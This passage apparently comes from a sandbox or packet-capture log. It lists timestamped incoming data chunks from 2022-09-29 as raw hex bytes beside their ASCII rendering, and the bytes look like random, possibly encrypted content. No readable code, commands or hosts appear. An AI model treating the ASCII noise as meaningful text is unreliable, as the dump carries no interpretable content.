                                                                                                                                                2022-09-29 12:49:27 UTC7068INData Raw: 5f 97 12 9c 6a 40 f9 c9 32 88 ea 14 0b 29 2a 75 ef d4 f4 f2 ff b1 9a 4f c8 1a f9 8a 9d 55 fa 27 e9 b1 21 64 03 7d ba e7 5e 08 e2 24 85 e6 3f 35 be 12 0e 62 6d 84 60 d1 d0 e2 90 7e b2 62 bd 3f c5 2e 38 71 78 c5 70 a1 38 76 26 e6 09 5c 2c 88 8a 1f 3b 55 be 95 32 a4 e3 df e6 45 32 f3 8b ef 71 c1 ef 97 63 7c 14 9b bf bc 6e 7f c9 b9 71 6c 8a 76 a5 88 09 74 3a cd 81 ab 8c 30 19 a6 c4 3a 59 87 8d 72 6f fe 13 6a 18 e7 d3 70 4f 90 a0 d7 e4 da aa 7a d9 0e ec 31 a7 5d 05 81 3f 79 8a 64 40 dc 27 9f 8a 97 22 55 25 d4 7a 3d 07 84 6f 7a 01 3a 3d 4d 85 50 b1 5c a9 ea 35 56 07 63 c7 4d 3d 56 ee c0 d5 81 e2 be 94 4e c7 32 9b 3e fa 98 69 20 7a c9 5b f1 60 78 62 93 d4 1c e0 1a 0e 22 65 f3 f3 07 17 26 fe 08 5e 0b 15 5f 14 52 0d 1e 78 eb 76 b6 2f 52 43 86 d4 8e 69 20 81 5a c2
                                                                                                                                                Data Ascii: _j@2)*uOU'!d}^$?5bm`~b?.8qxp8v&\,;U2E2qc|nqlvt:0:YrojpOz1]?yd@'"U%z=oz:=MP\5VcM=VN2>i z[`xb"e&^_Rxv/RCi Z
                                                                                                                                                2022-09-29 12:49:27 UTC7084INData Raw: 41 19 c9 1b 03 46 fd 41 c0 74 91 e9 2d 5e 28 e0 3c fd 85 24 d2 58 61 db 69 d2 41 f1 3c 56 20 43 6a 8e b5 6d 3f 7f 99 23 51 da bf 55 57 80 58 1d ed 0b e9 68 c9 27 b7 4b 94 aa 8f 4d 88 d4 da 86 46 3d d7 92 24 ab 3d 67 db 75 f3 15 c2 c5 c5 01 73 f6 e8 85 ea 0c 15 57 f0 6f 47 32 b7 2f 6d 89 f3 7e a4 97 7f cb 6e 1e e2 e0 6f 36 8f 78 ec ad 03 92 70 1f 0d ac da ff dc a7 5a 11 94 79 18 c5 fb f8 33 bb 82 3d 3d 09 9f 28 84 c3 87 bd b2 23 4c 97 ee f5 11 34 e7 74 cf 16 74 db fc cb 8d 70 e4 f7 58 ff 60 05 5b 41 af fa af 09 8a d3 34 10 ee 0b 66 2a 15 96 91 09 93 ae 5a df a9 0e 53 61 5e 89 e3 63 a7 2e bc bf 93 03 9d 68 c5 3d cd 4a f9 f6 a3 2e 2f b0 e1 10 37 f0 88 e6 77 e0 64 c6 23 b4 f2 36 06 cf c0 ab d1 23 df 89 a8 d5 cc b6 cb c3 03 cb a3 86 fd e7 1a f6 ab dc 42 7b a0
                                                                                                                                                Data Ascii: AFAt-^(<$XaiA<V Cjm?#QUWXh'KMF=$=gusWoG2/m~no6xpZy3==(#L4ttpX`[A4f*ZSa^c.h=J./7wd#6#B{
                                                                                                                                                2022-09-29 12:49:27 UTC7100INData Raw: 24 5b c6 55 04 bc 52 a8 bc 9e 74 39 ca 4a c9 c9 d0 97 70 02 bb 5a 6c d7 22 0f 76 7b 61 4c df 3a 53 e7 e5 20 fc 50 78 14 96 99 5a 3a 40 67 e9 13 d3 c3 10 59 5f 81 5c 6f 0d 8c 7b fc dc b3 41 a8 e3 fa c0 dd b6 c8 fb ad d4 1e 2f 04 f0 a0 89 f1 7b 46 5f 9c 1d 96 0f 1d 8b 9b c5 cd 84 4d cb 91 12 6c a1 b5 34 03 e6 db 60 77 69 ae 96 bf de 84 6e e7 69 5a 78 bc 15 29 a9 81 2b 32 53 33 e1 cc 4a b7 8b 23 58 d3 9a b7 31 2e 7b c3 38 10 34 e5 7b 46 e4 1f 00 f6 17 fb 42 15 84 a4 d7 4e fd 69 ee 0f a2 41 85 d5 fb b4 6c de c1 81 d7 42 1d 85 c2 63 67 94 e7 44 2c c8 da 4c 86 99 58 59 eb 65 79 07 93 89 c5 ef 8a 48 e9 d5 a3 d7 c0 60 6b 48 9f 50 59 84 e5 06 c6 1c b6 a0 f1 7e ba 2a 67 72 d0 c3 10 8d 41 59 ea cb 32 83 8f 90 1f 3e d0 42 65 a7 27 da aa 71 a9 08 79 9a 5e 3f cf 66 06
                                                                                                                                                Data Ascii: $[URt9JpZl"v{aL:S PxZ:@gY_\o{A/{F_Ml4`winiZx)+2S3J#X1.{84{FBNiAlBcgD,LXYeyH`kHPY~*grAY2>Be'qy^?f
                                                                                                                                                2022-09-29 12:49:27 UTC7116INData Raw: 43 88 4e ae eb 75 e4 50 34 5b aa 46 cf f2 63 af 76 60 76 70 de 7d 8a ff 25 40 d6 ce 86 5b 39 03 0d 6e 6f 18 db 83 64 6f 8d 96 0b 05 fe 72 b4 a9 6c 26 c4 c9 f3 d1 f5 68 95 41 cb 0f c9 7f 0d 5f 66 29 8a e1 23 07 ce ff 74 0e 7b 39 37 f2 ce a0 7e 52 09 a8 c1 0d 8c 08 4d 4c d5 b1 08 64 72 21 8b e4 5b 35 9a 9d 86 55 53 20 71 f9 f7 96 4b 48 ee 69 a8 73 46 22 12 be ca 0c 0b 08 13 8c 09 98 26 64 a7 9b 79 67 4a a2 70 d3 e9 94 3c f1 a9 0d 81 be b2 4d f3 fb 2c c1 93 44 95 7f f6 ac d0 73 a6 1f c4 02 87 ae 91 31 21 3b 63 f4 c0 aa cd a7 c1 cb 12 ab e2 8f 11 20 71 c5 14 e9 f0 be 76 6b fa 00 3a c6 8f f6 e0 ea 74 60 cf 21 49 f0 3c 5b 61 9c c6 ac ff e6 71 19 58 69 7c 26 d4 f0 13 97 0f ca f2 22 b2 2c e8 fb 0c 69 c5 98 70 e5 9c c8 d9 37 17 3f ed 9e 90 ed 4c eb 27 ce 65 9a 0e
                                                                                                                                                Data Ascii: CNuP4[Fcv`vp}%@[9nodorl&hA_f)#t{97~RMLdr![5US qKHisF"&dygJp<M,Ds1!;c qvk:t`!I<[aqXi|&",ip7?L'e
                                                                                                                                                2022-09-29 12:49:27 UTC7132INData Raw: 24 f8 c2 c2 d1 7d ed ac b9 68 7f 5f f6 74 4a ac d7 4a 0d 23 3a 2e 1c 73 02 e9 c8 05 f0 8e f0 ce 13 37 a9 0f e5 ad a3 5e ec dc dd e9 fa e8 20 b0 8a 28 30 8b a2 18 4a c8 ce ab 2d c3 23 2f 7f 6d 55 a6 46 2a 8c 94 cd 66 54 94 a4 56 4b 8b 46 1a 38 0a 30 7d d1 e7 41 ac 75 b3 de e1 3a 46 75 4e 29 e3 68 00 a6 62 c0 87 28 85 f1 62 4f 60 83 24 fe 06 aa dd 33 3a ca 8c eb 00 0f c2 d3 18 d9 9c 08 f9 a3 8c a2 21 39 00 14 5b f5 0c 48 75 50 3d 40 2a ad 7f 06 4a 7a ed bc 0a 53 27 0a 55 33 75 a3 96 15 8f 94 34 3e ab 5a e0 5f 6c 15 58 90 43 ad 7f 89 2a 8d 19 72 14 05 ab ec 1e 5f 44 77 7f 72 08 90 c6 7a 2c a3 0e e5 81 9b b9 85 57 47 ba 20 03 67 bb 1e 10 10 63 90 2c e5 09 2e af e8 d3 0c 38 c3 95 fe a9 4d f5 fb dc 82 06 97 fe ed c5 dd f6 33 55 e0 63 e5 e5 a5 bd 5c 80 e9 27 14
                                                                                                                                                Data Ascii: $}h_tJJ#:.s7^ (0J-#/mUF*fTVKF80}Au:FuN)hb(bO`$3:!9[HuP=@*JzS'U3u4>Z_lXC*r_Dwrz,WG gc,.8M3Uc\'
                                                                                                                                                2022-09-29 12:49:27 UTC7148INData Raw: a3 a8 c7 b1 1e 5c 05 49 d2 c0 89 1f 97 2b 16 e1 c0 e5 78 4c ac 39 3f 62 87 93 ec ff 0c 57 8a 92 9e b0 69 b8 12 32 27 58 4b 39 c3 5c be 16 fd a1 51 db 4b 45 a3 2b a4 f3 6d 07 03 49 8f f0 ff e2 91 ee 19 df 79 4b 3f 27 66 0b e6 92 8f 2a b1 21 20 dc cd db dd d5 ef 73 bd e9 0d 1a b3 be d2 a2 1f 85 aa 37 5e ed 99 01 2c a4 08 af e6 b2 28 53 ca a6 dd f5 56 5f 06 be ed 3a 2f 8a 0f f4 ee 62 a5 06 03 a7 05 4d 45 5a f7 f6 e1 a3 11 35 80 47 26 91 1f da 83 ae f9 83 59 9c 95 b7 dc 51 7e 87 d3 fc a6 b0 f7 de 14 9f 66 17 b3 58 f3 a1 71 ac be e4 15 94 da 0a 46 77 2d b2 96 9c b0 20 2b 7d 99 11 19 75 cf 8d 2c f8 67 5e 66 94 7b 65 ee 92 64 4a b2 67 60 d0 95 cf 9c 49 f6 2a 3a b4 91 77 ed a9 2a dd 4a a7 00 e4 fe 11 a8 c6 a5 25 5e ec 37 c8 dc cd f5 6e 10 6b 91 d1 a7 46 13 51 2e
                                                                                                                                                Data Ascii: \I+xL9?bWi2'XK9\QKE+mIyK?'f*! s7^,(SV_:/bMEZ5G&YQ~fXqFw- +}u,g^f{edJg`I*:w*J%^7nkFQ.
                                                                                                                                                2022-09-29 12:49:27 UTC7164INData Raw: 82 df 69 59 42 03 c0 91 d7 15 41 50 8f 47 5e 0b d9 56 2c e1 70 75 58 b3 d2 d1 8a 83 ad 8d 2b c3 bd f3 7a ae 45 01 48 1b 0c 6e 8b 1c 67 57 a3 8b 79 fe 42 60 36 f1 4f 19 a8 99 2d ea 7a 45 57 8e 9b 9c c9 01 e5 f5 c2 f6 e6 76 47 3b ea 2b 2e 61 d3 f7 f0 71 e3 6a da 37 d8 25 f3 b9 16 d8 b5 b6 75 91 a2 0f bb b3 0a e0 f6 81 dd 81 68 7b 30 4c e2 b0 53 d7 0d 50 b9 78 5c bc 34 be 1f c1 1f 49 12 4f 6d 0c 39 fd 08 a6 8b 28 c0 da 3e 88 3c fa 59 72 3d b4 08 22 f5 ce b3 79 a0 1e db 93 14 e1 83 77 eb 69 d7 c4 b4 aa 72 5b 42 57 1f 8b 12 0e 79 60 20 82 eb 5f ff f8 a9 ea 8d cf 39 c7 a0 68 dc 14 92 6a b6 78 85 6c 35 e7 5a 98 92 fd b4 79 4a 6f d3 2d e2 18 f8 1d 49 d4 dc 54 dc 36 67 da ba 22 94 5a a4 73 5a ad 3e 82 c7 d9 48 4e 85 d4 ad 75 8a 8d 80 21 a9 80 e3 1d 03 ed b8 6c c3
                                                                                                                                                Data Ascii: iYBAPG^V,puX+zEHngWyB`6O-zEWvG;+.aqj7%uh{0LSPx\4IOm9(><Yr="ywir[BWy` _9hjxl5ZyJo-IT6g"ZsZ>HNu!l
                                                                                                                                                2022-09-29 12:49:27 UTC7180INData Raw: 6b c9 37 87 e1 d9 14 b5 51 58 59 34 98 8f e3 c7 bd b5 14 54 c8 e8 79 f6 92 8c 44 6e 41 a2 d5 22 cc 64 9b 21 36 c3 95 d5 ab 9f cd 6c 99 ad 1d f6 b0 0b 8e c6 9a 66 63 f8 26 10 4b 69 fe cb fc 25 8a bf 3f 4a d5 25 c2 6b c0 b4 e0 3a aa fa f4 a6 d1 6d cf 08 d1 78 de b3 c7 52 e8 14 7d 15 52 fb 53 dc 72 4b 3d 51 01 21 24 9e 20 7f 7e 6c 7b d1 ed 7b 3f 4b 7d ae 7c a7 9d 73 ea 54 45 0a 6b 3d d8 24 9f ad 77 95 06 d6 31 a6 8a a0 d0 fc 95 2e be 0b 48 81 0c ad 08 20 ef fb 18 df 23 0e fb a5 64 7c 5e 27 63 d1 f9 84 e3 41 4d 0f c0 68 3f 44 ba ca b3 8d b2 fa e5 2e 7e e7 40 2c 2c 5b 80 27 f8 f8 ea d5 c3 45 f3 f0 55 9f f6 8a 98 3c 70 3d 08 1d fa 9d 10 09 cc a2 a4 fd 59 e7 d5 ee f9 d3 38 82 60 9f 44 17 0a 15 ae 29 50 d2 b0 b4 31 30 8b ab 4b d8 26 89 76 92 b9 4c c8 b4 45 5c 91
                                                                                                                                                Data Ascii: k7QXY4TyDnA"d!6lfc&Ki%?J%k:mxR}RSrK=Q!$ ~l{{?K}|sTEk=$w1.H #d|^'cAMh?D.~@,,['EU<p=Y8`D)P10K&vLE\
                                                                                                                                                2022-09-29 12:49:27 UTC7196INData Raw: c1 a8 af bf e9 d7 fc de 6e 38 b5 99 01 2a 2d f7 36 81 8a a7 2e c6 4d f9 5d 86 f2 0f bf 39 85 90 ba 17 7c 62 39 4b b4 16 15 b6 ba 50 85 42 5f 86 c3 aa 6e a0 a0 e5 65 89 8b 2e 7a a3 1c 1d 7e e1 ed 48 55 51 7b b3 d5 c8 81 ee 47 69 67 3a da 45 21 81 f2 ac 3f 10 75 a5 6e 5f 94 19 fb e0 b0 e4 4f 2e a3 18 b6 e1 ed 40 34 b8 ed aa 46 a0 bd b5 ef e9 f5 25 6c 06 0e 82 aa b2 b3 f0 c6 07 b7 c3 d8 44 9a d1 c1 3e 01 6f 40 92 b1 7d db f2 4e 3d a0 03 c0 5a 99 85 47 48 9c 30 cf a6 d9 84 1a 96 0d fd 51 4d ce 56 45 3a 88 66 1a 4c 21 cf 20 ca dd 19 ff ed 0c 49 55 8c 52 49 f8 ca 54 27 5f eb c4 38 d8 5f 41 2a 22 20 75 df de 07 8b 09 7d ac cd 68 5b 5d b8 3a 41 0e 9b 7a f5 04 53 ae 21 44 99 64 b8 41 2f 7f a7 66 ea b7 d2 32 b9 f8 0a 2b d6 94 f6 0e 56 7f 3d fe 20 1f 4d d9 67 8a 02
                                                                                                                                                Data Ascii: n8*-6.M]9|b9KPB_ne.z~HUQ{Gig:E!?un_O.@4F%lD>o@}N=ZGH0QMVE:fL! IURIT'_8_A*" u}h[]:AzS!DdA/f2+V= Mg
                                                                                                                                                2022-09-29 12:49:27 UTC7212INData Raw: 4e 7e b2 37 99 4b b8 b2 02 b1 3c bb 2c a3 36 d8 6e 1b 57 95 2a 43 16 36 53 e3 f2 25 26 bc 1a 80 d5 ad 7f 13 80 bb da 4b 3d d6 23 96 59 7e 83 1e 29 9f c7 06 ff e4 fc 8a b2 09 cd e6 0c 6e 63 9b 90 8c b0 e6 fb b7 69 ae 57 0b 67 d6 b4 78 2b 0b 59 44 7d 8e cf 0c f6 fc 63 9a eb 05 63 06 fa 41 c7 9b 18 35 77 f7 c9 f0 04 c8 6e 58 20 62 6c 1a dc 71 13 a3 fb 16 bc fd be 37 55 68 90 d5 0a 5a 03 50 9d d4 6c e6 45 f7 59 d2 85 76 ba d1 c8 e8 0d 98 c7 b6 bd c4 07 6f a4 c8 c4 ab a5 95 4d 75 6d 8d 1b a5 12 f7 84 8a 18 b2 b9 ff 56 e9 83 bb c5 5d 82 1a b5 59 2c 64 1d fa c3 82 60 3c c4 c5 4e 80 b2 55 d2 b0 3c 85 58 18 bf 3a be 45 5f 1c fd 25 d2 29 13 90 1f af e9 05 61 06 91 07 22 d9 16 8c fc f3 0b 5c 01 2a fd af b5 df 13 66 fd 5e c0 34 a9 77 2c ef fb 9a f8 5d 2e 44 54 86 ab
                                                                                                                                                Data Ascii: N~7K<,6nW*C6S%&K=#Y~)nciWgx+YD}ccA5wnX blq7UhZPlEYvoMumV]Y,d`<NU<X:E_%)a"\*f^4w,].DT
                                                                                                                                                2022-09-29 12:49:27 UTC7228INData Raw: 69 dc 7a 02 1e 6e 61 8f 92 70 25 27 a2 2a 02 62 f7 7f 09 fb 4b 37 af c3 f2 30 3b 81 b1 1e a7 f4 62 e6 63 ce 8e a4 3d a3 fd 95 4d ab 96 e8 a4 59 82 d0 90 0e 3b a9 ed a2 e5 11 e5 56 9c e9 60 6a 4f b7 35 f5 3e 7e 9b d3 54 60 30 3a 57 ca 96 3d 90 bb 05 cf 6b 4d d7 b9 74 23 50 76 05 a0 02 d0 29 1e 75 e4 a2 eb 0d 66 11 ea 05 32 e2 e5 92 3c c2 60 33 2f 21 5e a4 07 86 02 1e 80 ad a2 f6 bf d5 d7 74 d6 b9 0e 33 4c 16 52 98 e7 b9 f8 10 0a 63 07 8e 3b ff 32 d2 14 f9 16 9c 4e cf 29 36 06 07 ca 2f 07 7d 0c 85 43 01 f6 58 6b de 4d 59 4e a7 61 64 39 82 a1 37 2e de 1b c4 dd 7b b8 3a d4 da 2d d8 45 e2 e2 ce 92 8e 8d cd ec 40 2e 03 b0 48 9a 52 19 7f a4 aa cb 19 d2 21 58 df 0f 80 9f 15 f9 d9 25 00 ea 8b f0 f2 ff 94 a9 48 16 63 57 e5 52 4c 6b 19 a3 de 77 6f 5d 2a 94 9b 1e b0
                                                                                                                                                Data Ascii: iznap%'*bK70;bc=MY;V`jO5>~T`0:W=kMt#Pv)uf2<`3/!^t3LRc;2N)6/}CXkMYNad97.{:-E@.HR!X%HcWRLkwo]*
                                                                                                                                                2022-09-29 12:49:27 UTC7244INData Raw: fe 28 15 32 88 dd 3c dc a2 44 b1 bd 1c d9 fb 3d 68 2e 18 4b 1a 32 84 47 6c e1 ee ad b5 90 0f 46 01 31 4f dd 73 af 3f ed 03 f9 5a ab 7a 55 8e 39 e4 13 9d 05 85 c0 94 f8 d4 f4 0c 12 2c 3c 5f 43 f2 f2 fb 80 ab 38 b3 7d dc d0 5f 0f 1c c8 4c c2 2d 04 24 65 f5 2f d6 b1 4f 71 53 a4 a5 ae 1c 86 60 0f ff ef 1c 55 aa 47 34 bd 24 11 c5 b1 36 c4 41 32 5d 8b f1 f4 26 55 b1 76 31 b9 7e 47 6b 1b 7c 4b 48 01 2e 7f be ff d4 03 03 a2 2a 57 3b 9f 1b 6a 7d 73 c2 b1 85 9f f8 83 9b 59 ed c9 15 a7 1d 9b 27 c1 79 a2 d0 5e bb e4 14 a7 74 cc f5 76 a2 01 70 07 a2 df 05 50 16 d7 91 f6 fe 5f e4 56 b3 3c c4 c4 b2 e4 13 44 3a 05 db 80 7e 16 5c 6c 0d d4 6f c6 8c b7 f2 95 fd 88 1f 15 8a c4 65 25 e2 6a 97 e9 2e be 7d e2 23 47 bd fd 8a c8 a6 36 20 14 ee ae df dc 3e cd 42 fd 78 e5 12 ab 10
                                                                                                                                                Data Ascii: (2<D=h.K2GlF1Os?ZzU9,<_C8}_L-$e/OqS`UG4$6A2]&Uv1~Gk|KH.*W;j}sY'y^tvpP_V<D:~\loe%j.}#G6 >Bx
                                                                                                                                                2022-09-29 12:49:27 UTC7260INData Raw: ac 0b 9d e9 3d 8a 54 92 62 78 24 0d 31 d1 d2 2b 53 84 a2 0e 7e bf d4 e0 a4 e3 45 01 a2 2e bb 19 3f d4 b2 ab ad 11 e2 2d 5c a6 c6 5b 57 77 e7 31 eb cc 80 16 e1 fa d9 10 d8 de 1e 60 50 19 50 14 55 1f 7d 08 62 9c 4e d4 b1 e9 65 1b 16 4f 15 f3 0e 49 c3 1e 7a 5f da 6b 18 5d ec 2f 9e 35 41 fa 33 f0 82 61 23 63 50 e4 18 81 c6 ac 34 b8 92 70 6c bc 4f 51 66 89 55 7b bf 1c 50 09 c2 3d d8 47 9e f9 d5 06 e7 32 73 f6 85 45 60 57 d8 c6 76 d5 f3 d7 16 12 63 99 ca 59 f5 49 87 9c 4e cd a2 3c 0c 99 87 05 1c 66 b0 18 93 c7 c9 01 f5 c3 23 7a ed 92 b9 83 a8 2c 5b f1 ab 37 84 cf 0d 49 e3 18 ea 00 3c 5e 79 26 9b 73 1f 9b f9 af 3b e4 31 c1 fc 4f cf c1 c6 ee e7 ec e5 6e fe 86 21 37 5c fa f8 f2 91 df 77 4b 8c 74 7b c2 c9 aa 5d 4a fa 96 02 51 a4 7d 70 10 53 d3 fc 65 f7 30 41 cf 17
                                                                                                                                                Data Ascii: =Tbx$1+S~E.?-\[Ww1`PPU}bNeOIz_k]/5A3a#cP4plOQfU{P=G2sE`WvcYIN<f#z,[7I<^y&s;1On!7\wKt{]JQ}pSe0A
                                                                                                                                                2022-09-29 12:49:27 UTC7276INData Raw: 24 cc 0e fa 69 87 97 24 e6 e1 eb 8e 48 be 19 db 0c 38 73 42 b9 3c 68 0c 4a 06 98 bc 74 4d 21 7d 1f c5 de 67 5f af cc c1 a5 61 9c 43 23 8b a6 4f 42 ce 4b 3c 24 ba c6 33 2b d2 fb ca 42 58 b2 c0 25 5c 76 62 f3 e5 6d 32 5e fc 22 b2 b3 43 1a 51 d5 35 d6 85 0e 32 65 bc 75 1a ef e7 4e 71 f0 da ba 0e 37 64 06 a6 41 cb 48 16 84 a5 d0 d2 74 7a 9a c6 a6 a0 f3 dc 89 da ba 23 4f 15 6f 4a e9 bf 82 44 88 fa 0b 2e 7f 3c 18 a9 d7 ba 71 ab 6f 74 dc 99 6a 39 e7 d3 45 ea 9c f1 5d b4 40 2c 41 7e 48 11 ba 42 ba de 06 15 78 a0 b1 39 67 16 6f 72 0f 02 98 f0 b6 47 01 20 f0 75 85 61 f6 fe 7b 45 18 14 a8 ca 35 f4 7d 2f e9 43 02 15 36 39 8d 09 be 4e 2a 78 fe b8 89 10 8d c9 4f 49 dc a7 0f c8 2c 2a e9 83 3d f1 03 1c 91 19 52 9b e6 c4 c0 85 24 a7 95 ef 62 b2 ae af fa 8d 3d 66 29 c0 23
                                                                                                                                                Data Ascii: $i$H8sB<hJtM!}g_aC#OBK<$3+BX%\vbm2^"CQ52euNq7dAHtz#OoJD.<qotj9E]@,A~HBx9gorG ua{E5}/C69N*xOI,*=R$b=f)#
                                                                                                                                                2022-09-29 12:49:27 UTC7292INData Raw: 56 63 fc 03 14 2b 91 9b 32 7e 9e e0 d0 94 b8 f0 bd 1f 49 a3 da a1 5d 77 e9 f5 5c 8d 8c 9b 2c 25 54 5f 8e 50 d3 44 21 06 89 86 be 78 2e fe 94 33 16 00 85 a4 dd c0 11 e4 52 6e b2 ba ab 10 d7 82 f4 43 af 9c 89 af 84 2b 15 38 33 23 d6 04 fb 5e 24 b4 44 0d 5f f1 b0 c2 af 51 c1 8e 6e 45 f6 12 a1 ae 5b fd db 2c 4b 29 48 ff c1 c7 fa 37 13 c7 72 7d 62 0b a7 9f 7b 53 91 a7 08 14 58 aa 05 19 34 ca 50 e9 bc 54 ce 67 72 24 0a 4c 86 e2 cf 84 1f f0 20 a6 ed 02 a1 75 19 ec d1 cf bf 69 ce bf 7d 75 16 0b 1d 60 d5 be 4d 44 06 90 c4 e5 42 e8 cc 22 33 51 3e df a6 06 b6 1e 93 fe a5 cb aa ee 4b 27 d8 d9 5e 08 d0 be 40 7f e5 32 c5 f8 76 2e 9b ef fe e0 55 f2 de 10 d4 36 03 a5 c3 c0 93 b2 30 2a 98 ef a0 09 ca c7 95 60 87 09 4d 32 14 31 4c 5c 4a 1d 45 48 75 60 53 d4 8f 06 b2 ab 63
                                                                                                                                                Data Ascii: Vc+2~I]w\,%T_PD!x.3RnC+83#^$D_QnE[,K)H7r}b{SX4PTgr$L ui}u`MDB"3Q>K'^@2v.U60*`M21L\JEHu`Sc
                                                                                                                                                2022-09-29 12:49:27 UTC7308INData Raw: 51 29 4a 96 e1 7d ba 38 c8 bb 1d d7 ca cc 1d 63 08 07 a1 a1 05 6f 14 20 7e 84 12 3c c1 01 fc fb 55 ff 0f b4 2f 22 12 35 94 46 a5 4f 72 36 f5 9c 54 44 54 ff e0 6f e0 08 53 b9 35 29 08 8a 30 2a 2a 7e 3f 45 93 bd 54 ee 34 90 99 db e8 59 79 7b 5f 4f 03 d4 ae 16 8b 21 ea c1 1b 86 e3 99 bf 01 42 62 18 a5 4b 02 19 e3 5b 7a a0 e8 67 6b 0a 5c 39 7b 66 ce 67 68 83 0d ba e0 c7 c5 12 7c 1b 2f 60 d3 d6 02 e6 6e 97 71 2a 0d 76 9f b6 8d 80 70 4d 40 d8 ff 8b b3 e9 22 bb b9 7a 73 b1 96 eb 86 7e 49 f5 9b 40 9e d3 52 e8 2f 34 b3 21 19 a5 a4 c7 6e 1d 84 d8 92 a0 e4 d9 37 12 ca 70 7c a5 4f bf bb 83 00 81 cf 12 5a 9c c3 9e 29 e7 03 6e 4e 64 c6 e1 59 cb 74 bf cb eb 29 02 03 e4 c0 74 50 f3 5c 8b f9 90 96 82 ce 8c e5 ea 28 39 0f 79 06 e1 0f 4c 3a fa 20 66 28 52 f4 09 5c be 82 f5
                                                                                                                                                Data Ascii: Q)J}8co ~<U/"5FOr6TDToS5)0**~?ET4Yy{_O!BbK[zgk\9{fgh|/`nq*vpM@"zs~I@R/4!n7p|OZ)nNdYt)tP\(9yL: f(R\
                                                                                                                                                2022-09-29 12:49:27 UTC7324INData Raw: 42 c5 36 d3 f5 93 f5 cd ba 2e 13 7e 90 be 1c fe 01 55 50 04 13 84 9c 57 7b a0 60 c2 1e e8 9c 69 36 ad 27 12 80 a7 a8 b9 3b f8 36 4b fa 14 d4 20 a8 40 7b 31 ad 93 95 5a 6b ae 1d 82 47 ef 33 79 8c 33 8c c5 b9 5c f9 3a 48 e5 38 5e 68 a6 a5 8b e7 e2 ae 2c 24 52 d0 b7 54 14 2c 67 e2 b6 f5 37 d1 a4 4f 77 eb e7 b0 68 2b 4e 4f 1d 75 61 ae 03 bb 02 93 9e 7c 41 8d 89 62 a0 54 2e 8e f1 dd af 56 f2 94 b9 e8 6c 06 72 7b cd 61 ca 50 87 cd 9a e1 67 9c 1e a6 e7 bb 7e 98 88 0f 20 d5 c2 f0 82 7e 57 4d e7 06 42 33 73 c6 56 46 ed 91 11 34 f4 90 73 e6 4e 50 e8 f3 54 b9 42 4b d4 2e 87 84 ab ea bd f3 11 f4 35 6c 3b fd f7 a4 07 47 64 a0 8f c2 e3 63 ab 98 24 cd a8 68 de 62 63 7b 80 aa 04 0d 24 92 a7 f1 c0 98 3a f1 d4 ba d1 4d b3 b6 ba 4b ab 85 57 2d 93 24 1f 35 a3 c3 f3 f3 03 76
                                                                                                                                                Data Ascii: B6.~UPW{`i6';6K @{1ZkG3y3\:H8^h,$RT,g7Owh+NOua|AbT.Vlr{aPg~ ~WMB3sVF4sNPTBK.5l;Gdc$hbc{$:MKW-$5v
                                                                                                                                                2022-09-29 12:49:27 UTC7340INData Raw: 4e f0 3d 31 a5 37 e4 31 15 ef ab b8 91 88 59 a1 d4 2f ff 71 e7 0b 0e 9c ae 44 a0 da 60 44 07 d9 7b d1 37 82 ff a5 9e 0e 81 1a 7b b9 51 8d 21 49 8c 1d 2f 6a 93 55 8d 80 b7 f0 e5 15 09 00 82 cd 19 7b cb 56 28 57 c0 48 4a ee 7d 2d 5c dc 6b 28 11 f0 0c b3 17 93 c6 d7 7a b8 3c fa 18 55 9d 39 63 b1 6e a7 3a 4d 09 63 aa 2d fd 99 e4 67 1d 1a 78 f3 9f f4 1e 1d 0e ad ba f9 ad 62 e6 ac b2 7f 4f f1 ba 5a aa 16 de e4 be ae fa 29 69 87 14 43 56 2f 91 75 20 68 e6 0a c6 92 04 15 61 ba 96 94 63 ad 72 09 b4 21 4a f4 a9 f1 d8 d8 f8 4b dc 23 b5 3f ce 6e 2c ec 5c d9 6a 3b 58 72 29 e8 ae 2b b6 8c b6 ec ba 96 af a9 52 4c 43 ac 9b ec db 78 2f fc ea a7 9f ad e8 f2 ad 8b 9e 5c 0a 89 60 90 2c 16 d3 54 d3 ab 8e 85 47 c1 aa 5d a1 59 bd 19 5a fb f6 ba 06 07 10 71 38 7f a9 bd 00 42 61
                                                                                                                                                Data Ascii: N=171Y/qD`D{7{Q!I/jU{V(WHJ}-\k(z<U9cn:Mc-gxbOZ)iCV/u hacr!JK#?n,\j;Xr)+RLCx/\`,TG]YZq8Ba
                                                                                                                                                2022-09-29 12:49:27 UTC7356INData Raw: 13 08 b3 34 99 3c 46 c1 0f 56 62 db 9d 41 a1 b5 1c 0e fe ba 99 f1 7b f1 bf f5 10 ba 58 20 f1 c9 18 19 f5 77 f2 f9 14 27 3c b6 e4 f9 59 0b 03 a6 a7 f6 5a 60 11 c9 7c 8b 32 7f 3f 9c d7 52 98 00 b5 39 fd f9 e7 98 9a 08 3f f3 1f 47 dc b4 a1 f9 cc d0 a4 27 a0 7d b4 d7 e7 6d 82 c9 a4 db 00 d2 a2 7f 0e 3b 7a cb 19 a3 3a 8e 63 81 3d 58 31 29 5f e9 2c 22 fb 89 dd bf 29 60 3d 39 5d 62 78 84 dc 31 b1 95 3e ce 4f cc d4 e4 91 fe 44 71 0c 75 59 1d 9d de 56 04 92 a2 d6 19 76 3b c8 65 ff ed da d6 0b 2d 3e e0 b5 b3 52 6d ea 50 d8 8a 6d 44 ae 93 cd 66 80 80 71 68 42 4b 94 32 9f 13 b2 37 71 c2 a6 28 13 f8 62 7e 34 39 10 5e de ad f1 44 98 20 cb e8 41 bf bd 8d 8c 6c 3b a8 04 a1 7f 92 d9 bd ef 31 48 03 4d 26 33 5b fd 6d f6 ce a4 fa 40 8e 28 18 ab 0e d5 bb d3 6d 28 77 76 2d ea
                                                                                                                                                Data Ascii: 4<FVbA{X w'<YZ`|2?R9?G'}m;z:c=X1)_,")`=9]bx1>ODquYVv;e->RmPmDfqhBK27q(b~49^D Al;1HM&3[m@(m(wv-
